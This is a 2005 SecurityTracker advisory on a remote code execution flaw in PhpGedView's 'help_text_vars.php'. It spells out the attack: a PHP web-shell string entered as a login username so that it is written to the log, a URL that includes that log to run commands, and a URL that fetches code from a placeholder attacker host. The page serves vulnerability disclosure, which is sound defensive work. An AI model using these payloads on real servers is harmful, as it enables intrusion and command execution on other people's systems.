SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Generic)  >   PhpGedView Vendors:   phpgedview.sourceforge.net
PhpGedView Include File Bug in 'help_text_vars.php' Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1015395
SecurityTracker URL:  http://securitytracker.com/id/1015395
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Dec 21 2005
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 3.3.7 and prior versions
Description:   rgod reported a vulnerability in PhpGedView. A remote user can execute arbitrary commands on the target system.

The 'help_text_vars.php' script does not properly validate user-supplied input in the 'PGV_BASE_DIRECTORY' parameter. If register_globals is enabled, a remote user can supply a specially crafted URL to cause the target system to include and execute a local file on the target system.

A remote user can cause arbitrary PHP code to be written to the application log file by attempting to long with the following values:

username: <?php system($_GET[cmd]);?>
password: [nothing]

Then, the remote user can invoke the following type of URL to cause the arbitrary PHP code to be executed by the web server:

http://[target]/[path]/help_text_vars.php?cmd=ls-%20la&PGV_BASE_DIRECTORY=./index/pgv-[year][month].log

The PHP code, including operating system commands, will run with the privileges of the target web service.

If magic_quotes_gpc is disabled, the remote user can inject arbitrary PHP code via the 'user_language', 'user_email', and 'user_gedcomid' fields.

If register_globals and allow_url_fopen are enabled, a remote user can can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. A demonstration exploit URL is provided:

http://[target]/[path]/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://[attacker]/path/code.txt

The original advisory is available at:

http://rgod.altervista.org/phpgedview_337_xpl.html
Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  phpgedview.sourceforge.net/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents
Date:  Tue, 20 Dec 2005 17:18:14 +0100
Subject:  PHPGedView <= 3.3.7 remote code execution

http://rgod.altervista.org/phpgedview_337_xpl.html
 
rgod


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC